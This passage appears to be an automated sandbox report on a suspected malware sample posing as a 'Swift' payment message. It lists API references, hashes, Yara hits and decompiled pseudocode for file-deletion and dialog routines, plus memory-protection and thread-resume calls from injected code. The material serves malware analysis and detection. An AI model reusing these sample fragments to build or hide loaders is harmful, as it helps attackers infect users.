0x10001f24
0x10001f2b
0x10001f2d
0x10001f30
0x10001f37
0x10001f38
0x10001f3e
0x10001f3e
0x00000000
0x10001f3e
0x10001f32
0x10001f35
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10001e3e
0x10001cff
0x10001cff
0x10001d00
0x10001e26
0x00000000
0x10001e26
0x10001d06
0x10001d07
0x00000000
0x00000000
0x10001d0f
0x10001d0f
0x10001d12
0x10001d5d
0x00000000
0x10001d5d
0x10001d14
0x10001d14
0x10001d17
0x10001d41
0x10001d44
0x10001d47
0x10001e18
0x10001e18
0x10001e18
0x10001d4d
0x10001d4d
0x10001d4d
0x10001e1e
0x00000000
0x10001e1e
0x10001d1a
0x10001d1a
0x10001d1b
0x10001d3e
0x10001d40
0x10001d40
0x00000000
0x10001d40
0x10001d1d
0x10001d1d
0x10001d20
0x10001d3a
0x00000000
0x10001d3a
0x10001d22
0x10001d22
0x10001d25
0x10001d36
0x00000000
0x10001d36
0x10001d27
0x10001d27
0x10001d28
0x10001d32
0x00000000
0x10001d32
0x10001d2b
0x10001d2c
0x00000000
0x00000000
0x10001d2e
0x00000000
0x10001d2e
0x00000000
0x10001bdd
0x10001b7f
0x10001b82
0x10001bb1
0x10001bb5
0x10001bbc
0x10001bc3
0x10001bc6
0x10001bc9
0x00000000
0x10001bc9
0x10001b84
0x10001b85
0x10001ba0
0x10001ba7
0x10001baa
0x00000000
0x10001baa
0x10001b8a
0x00000000
0x10001b90
0x10001b90
0x10001b97
0x00000000
0x10001b97
0x10001b8a
0x10001d83
0x10001d88
0x10001d8d
0x10001d91
0x100021c5
0x100021cb
0x10001da3
0x10001da5
0x10001da6
0x100020ee
0x100020ee
0x100020f1
0x100020f4
0x10002111
0x10002117
0x10002119
0x1000211f
0x10002136
0x10002136
0x10002136
0x10002143
0x10002149
0x1000214c
0x10002152
0x10002154
0x10002158
0x1000215a
0x10002161
0x10002166
0x10002169
0x1000216b
0x10002170
0x10002182
0x10002182
0x10002170
0x10002169
0x10002158
0x10002188
0x1000218b
0x10002195
0x1000219d
0x100021aa
0x100021b0
0x100021b3
0x100020e3
0x100020e3
0x00000000
0x100020e3
0x100021b9
0x100021bf
0x100021bf
0x00000000
0x00000000
0x100021c1
0x100021c1
0x100021c1
0x100021c1
0x00000000
0x1000218d
0x1000218d
0x10002193
0x00000000
0x00000000
0x00000000
0x10002193
0x1000218b
0x10002122
0x10002128
0x1000212a
0x10002130
0x00000000
0x00000000
0x00000000
0x10002130
0x100020f6
0x100020fd
0x10002103
0x10002109
0x00000000
0x10002109
0x10001dac
0x10001dad
0x100020cd
0x100020cd
0x100020d3
0x100020d6
0x00000000
0x00000000
0x100020dd
0x100020e2
0x00000000
0x100020e2
0x10001db4
0x00000000
0x00000000
0x10001dba
0x10001dba
0x10001dc3
0x10001dc8
0x10001dce
0x00000000
0x00000000
0x10001dd4
0x10001de1
0x10001de7
0x10001df1
0x10001df7
0x10001dff
0x10001e0f
0x00000000
0x10001e0f

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
GlobalFree.KERNEL32(00000000), ref: 10001C89
GlobalFree.KERNEL32(?), ref: 10001D83
GlobalFree.KERNEL32(?), ref: 10001D88
GlobalFree.KERNEL32(?), ref: 10001D8D
GlobalFree.KERNEL32(00000000), ref: 10001F38
lstrcpyW.KERNEL32(?,?), ref: 1000209C

Memory Dump Source

Source File: 00000001.00000002.7936337323.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.7936306097.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936376155.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.7936411270.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Global$Free$lstrcpy$Alloc
String ID:
API String ID: 4227406936-0
Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00405990 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E00405990(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C5B(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x434f88 =  *0x434f88 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E00406282(0x42f250, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B9F(_t68);
					} else {
						lstrcatW(0x42f250, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x42f250,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E00406282(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405948(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052E6(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x434f88 =  *0x434f88 + 1;
										} else {
											E004052E6(0xfffffff1, _t68);
											E00406048(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E00405990(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x42f250 - 0x5c;
					if( *0x42f250 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E004065C5(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B53(_t68);
							_t38 = E00405948(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052E6(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052E6(0xfffffff1, _t68);
							return E00406048(_t67, _t68, 0);
						}
						L30:
						 *0x434f88 =  *0x434f88 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x0040599a
0x0040599f
0x004059a8
0x004059ab
0x004059b3
0x004059b6
0x004059b9
0x004059c1
0x004059c3
0x004059c4
0x00000000
0x004059c4
0x004059cf
0x004059d2
0x004059d2
0x004059d2
0x004059d6
0x004059e9
0x004059f0
0x004059f5
0x004059f9
0x00405a09
0x004059fb
0x00405a01
0x00405a01
0x00405a0e
0x00405a12
0x00405a1e
0x00405a24
0x00405a29
0x00405a2f
0x00405a3a
0x00405a40
0x00405a42
0x00405a45
0x00405aef
0x00405aef
0x00405af3
0x00405af5
0x00405af5
0x00405af5
0x00405af5
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a4b
0x00405a4b
0x00405a4b
0x00405a53
0x00405a73
0x00405a7b
0x00405a80
0x00405a87
0x00405aa2
0x00405aa7
0x00405aa9
0x00405acd
0x00405aab
0x00405aab
0x00405aae
0x00405ac2
0x00405ab0
0x00405ab3
0x00405abb
0x00405abb
0x00405aae
0x00405a89
0x00405a8f
0x00405a91
0x00405a97
0x00405a97
0x00405a91
0x00000000
0x00405a87
0x00405a55
0x00405a5d
0x00000000
0x00000000
0x00405a5f
0x00405a67
0x00000000
0x00000000
0x00405a69
0x00405a71
0x00000000
0x00000000
0x00000000
0x00405ad2
0x00405ada
0x00405ae0
0x00405ae0
0x00405ae9
0x00000000
0x00405ae9
0x00405a14
0x00405a1c
0x00000000
0x00000000
0x00000000
0x004059d8
0x004059d8
0x004059da
0x00405afa
0x00405afc
0x00405aff
0x00405b50
0x00405b50
0x00405b50
0x00405b01
0x00405b04
0x00405b0f
0x00405b14
0x00405b16
0x00000000
0x00000000
0x00405b19
0x00405b25
0x00405b2a
0x00405b2c
0x00000000
0x00405b47
0x00405b2e
0x00405b31
0x00000000
0x00000000
0x00405b36
0x00000000
0x00405b3d
0x00405b06
0x00405b06
0x00000000
0x00405b06
0x004059e0
0x004059e3
0x00000000
0x00000000
0x00000000
0x004059e3

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76203420,00000000), ref: 004059B9
lstrcatW.KERNEL32(Carrels\Taktfastere.Obm,\*.*), ref: 00405A01
lstrcatW.KERNEL32(?,0040A014), ref: 00405A24
lstrlenW.KERNEL32(?,?,0040A014,?,Carrels\Taktfastere.Obm,?,?,C:\Users\user\AppData\Local\Temp\,76203420,00000000), ref: 00405A2A
FindFirstFileW.KERNELBASE(Carrels\Taktfastere.Obm,?,?,?,0040A014,?,Carrels\Taktfastere.Obm,?,?,C:\Users\user\AppData\Local\Temp\,76203420,00000000), ref: 00405A3A
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405ADA
FindClose.KERNEL32(00000000), ref: 00405AE9

Strings

"C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe", xrefs: 00405990
Carrels\Taktfastere.Obm, xrefs: 004059E9, 004059EF, 00405A00, 00405A39
\*.*, xrefs: 004059FB
C:\Users\user\AppData\Local\Temp\, xrefs: 0040599E

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\Swift Mesaj#U0131#09971.exe"$C:\Users\user\AppData\Local\Temp\$Carrels\Taktfastere.Obm$\*.*
API String ID: 2035342205-2084697700
Opcode ID: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
Instruction ID: f2c7612d72ec45a398f238805cdec5f3e53338685f49ce317d80e039c8d46841
Opcode Fuzzy Hash: 7c40550cfb6058a41fac62682ca690ff842edb60165f8b14098a153ca22c4312
Instruction Fuzzy Hash: 4E41C230A01A14AACB21AB658C89AAF7778DF81764F14427FF801711C1D77CA992DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 004065C5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004065C5(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x430298); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x430298;
			}

0x004065d0
0x004065d9
0x00000000
0x004065e6
0x004065dc
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00430298,C:\,00405CA4,C:\,C:\,00000000,C:\,C:\,?,?,76203420,004059B0,?,C:\Users\user\AppData\Local\Temp\,76203420), ref: 004065D0
FindClose.KERNEL32(00000000), ref: 004065DC

Strings

C:\, xrefs: 004065C5

Memory Dump Source

Source File: 00000001.00000002.7933520080.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.7933489483.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933579925.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933613900.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933829998.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933863380.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933904091.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933934364.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7933968615.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934029306.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934066899.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.7934106113.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Swift Mesaj#U0131#09971.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: C:\
API String ID: 2295610775-3404278061
Opcode ID: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction ID: c6d438537f48b5b2fd9a798109b403d1ef13146c040350fe47557a90c5bdf24f
Opcode Fuzzy Hash: 09a722932e0a1bea88283b0440f714d8f88131f4b1bd488506181814d844a3ce
Instruction Fuzzy Hash: E6D012315091206BC6551B387E0C84B7A589F153717258B37B86AF11E4C734CC628698

Uniqueness

Uniqueness Score: -1.00%

Function 02AF4FB7 Relevance: 4.0, Strings: 3, Instructions: 270COMMON

Download Yara Rule

Strings

\D8, xrefs: 02B11331
\(X}, xrefs: 02AF5111
+Bo, xrefs: 02AF511E

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: +Bo$\(X}$\D8
API String ID: 0-2725587592
Opcode ID: e81d0a690a5b752d4cf89511a6ed34bf3cdde9e1f133c2e1255fc9252a84666a
Instruction ID: 5bef386cb0c24e0f158612a810ef25249955cbca57c56b5094e751c05b8ee61b
Opcode Fuzzy Hash: e81d0a690a5b752d4cf89511a6ed34bf3cdde9e1f133c2e1255fc9252a84666a
Instruction Fuzzy Hash: 31918671A003499FDF348E689D993DE37E2EF46360FD8855EDC4A6B294E3318684CB06

Uniqueness

Uniqueness Score: -1.00%

Function 02B0FF3F Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 238fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNELBASE(?), ref: 02B1015D

Strings

\D8, xrefs: 02B11331

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: \D8
API String ID: 823142352-642886963
Opcode ID: 73a58d23f0f3b3c1b3b0bf20cf0ce3bd49940ede4a5e147ccf4b8d6bbd80abe9
Instruction ID: 1975818d013333e12a047b25cb9d7d73d20db8edc79c36c441722aad50cccf22
Opcode Fuzzy Hash: 73a58d23f0f3b3c1b3b0bf20cf0ce3bd49940ede4a5e147ccf4b8d6bbd80abe9
Instruction Fuzzy Hash: D2817B71A003499FDF305E789D957DB37A2EF06790F95411ADC8A6B680D3364985CB02

Uniqueness

Uniqueness Score: -1.00%

Function 02AFC4B4 Relevance: 2.8, Strings: 2, Instructions: 332COMMON

Download Yara Rule

Strings

\D8, xrefs: 02B11331
B}i, xrefs: 02AFC724

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: B}i$\D8
API String ID: 0-4085235996
Opcode ID: b67dc26c014c690c23917b7f936fb8f86d4a4699e3644a1f63c8952701705e1b
Instruction ID: ecf56499ab15a2c3e483b54fa782c20e89498f3ad7bb67a98daad3e3fa690000
Opcode Fuzzy Hash: b67dc26c014c690c23917b7f936fb8f86d4a4699e3644a1f63c8952701705e1b
Instruction Fuzzy Hash: 92B1AA75B043099FDF349E38DDA43EA37A3AF15360F95812EDC8A9B284D7358985CB06

Uniqueness

Uniqueness Score: -1.00%

Function 02AFBBF9 Relevance: 1.6, Strings: 1, Instructions: 330COMMON

Download Yara Rule

Strings

\D8, xrefs: 02B11331

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID: \D8
API String ID: 0-642886963
Opcode ID: 6923708a49c083a170beb1e50b00f5a2459ff0dd6d1db5b5f38ae609ed894b9c
Instruction ID: dab69b0bb807f50ee906662db5a2864d116d4b03ad3bd55dd77ff81982eca3ca
Opcode Fuzzy Hash: 6923708a49c083a170beb1e50b00f5a2459ff0dd6d1db5b5f38ae609ed894b9c
Instruction Fuzzy Hash: 09C155B0A00306AFDF309F78CD997DA37A2EF05390F95815ADC8A8B291D7358985CF02

Uniqueness

Uniqueness Score: -1.00%

Function 02B15868 Relevance: 1.5, APIs: 1, Instructions: 39nativethreadCOMMON

Download Yara Rule

APIs

NtResumeThread.NTDLL(00000001,02B16696,7B1CB242,?), ref: 02B15A95

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: aa6412b343b5b0ed187657eb58846200e02a6e95a8a06c04c3e38116a8d45993
Instruction ID: 870bcfb9986931096c7261c3fd67f2303e4ab8661714d78eb521437af084b18a
Opcode Fuzzy Hash: aa6412b343b5b0ed187657eb58846200e02a6e95a8a06c04c3e38116a8d45993
Instruction Fuzzy Hash: C8F08C31150249CFCB389E788DC43DD37A2EBC4351FE04166CA56CB698E7309949CB11

Uniqueness

Uniqueness Score: -1.00%

Function 02B146D7 Relevance: 1.5, APIs: 1, Instructions: 35nativeCOMMON

Download Yara Rule

APIs

NtProtectVirtualMemory.NTDLL ref: 02B147A4

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: deba4cced546950031fdc4003f0e565bd72fc8b0d3a3ccf79a02c692f90af9ca
Instruction ID: 10f7643efdc2808982f2915e06b643056fa83acc4d3ee4d6695c97f80d07a8aa
Opcode Fuzzy Hash: deba4cced546950031fdc4003f0e565bd72fc8b0d3a3ccf79a02c692f90af9ca
Instruction Fuzzy Hash: F60169B4A042859FEB28CF1DD858BEAB3EAEFC4300F15C11DE89D9B204D7309A00CB51

Uniqueness

Uniqueness Score: -1.00%

Function 02AF39D5 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.7935875493.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02AF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2af0000_Swift Mesaj#U0131#09971.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d175440100fbc13caff1aec84096fa593723f51e74f9b6ebb6ee3633f7ff8ad
Instruction ID: 4047e021997f3c571967d18fff45ab10d9807b2fb60e4fcf2d25f4001b2e717e
Opcode Fuzzy Hash: 9d175440100fbc13caff1aec84096fa593723f51e74f9b6ebb6ee3633f7ff8ad
Instruction Fuzzy Hash: 9E71DB335193D88FEF128F7485C52C9BFB6EF86264B590CDCD991AB502D621946ACBC0

Uniqueness

Uniqueness Score: -1.00%

Function 00403D3E Relevance: 48.3, APIs: 32, Instructions: 346
windowstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00403D3E(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x42d230 = _t37;
					if(_t118 == 0x110) {
						 *0x434ee8 = _t128;
						 *0x42d244 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x42b210 = _t94;
						E00404217(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x433ec8);
						 *0x433eac = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x42d230 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x434f20;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E00404263(0x40b);
						while(1) {
							_t39 =  *0x42d230;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x434f24;
							if(_t41 ==  *0x434f24) {
								E0040140B(1);
							}
							__eflags =  *0x433eac - _t136;
							if( *0x433eac != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x434f24; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E004062A4(_t119, _t128, _t133, 0x444000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E00404217(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E00404217(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E00404217(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x434f8c - _t136;
							_v32 = _t51;
							if( *0x434f8c != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404239(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x42b210, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x434f8c - _t136;
							if( *0x434f8c == _t136) {
								_push( *0x42d244);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x42b210);
							}
							E0040424C();
							E00406282(0x42d248, E00403D1F());
							E004062A4(0x42d248, _t128, _t133,  &(0x42d248[lstrlenW(0x42d248)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x42d248); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x433eb8); // executed
									 *0x42c220 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x434ee0,  *_t133 +  *0x433ec0 & 0x0000ffff, _t128,  *(0x40a36c +  *(_t133 + 4) * 4), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x433eb8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E00404217(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x433eb8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x433eac - _t136;
									if( *0x433eac != _t136) {
										goto L61;
									}
									ShowWindow( *0x433eb8, 8);
									E00404263(0x405);
									goto L58;
								}
								__eflags =  *0x434f8c - _t136;
								if( *0x434f8c != _t136) {
									goto L61;
								}
								__eflags =  *0x434f80 - _t136;
								if( *0x434f80 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x433eb8);
						 *0x434ee8 = _t136;
						EndDialog(_t128,  *0x42ba18);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x433eb8, 0x40f, 0, 1);
						__eflags =  *0x433eac;
						return 0 |  *0x433eac == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x42d228, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x42d228,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E0040427E(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
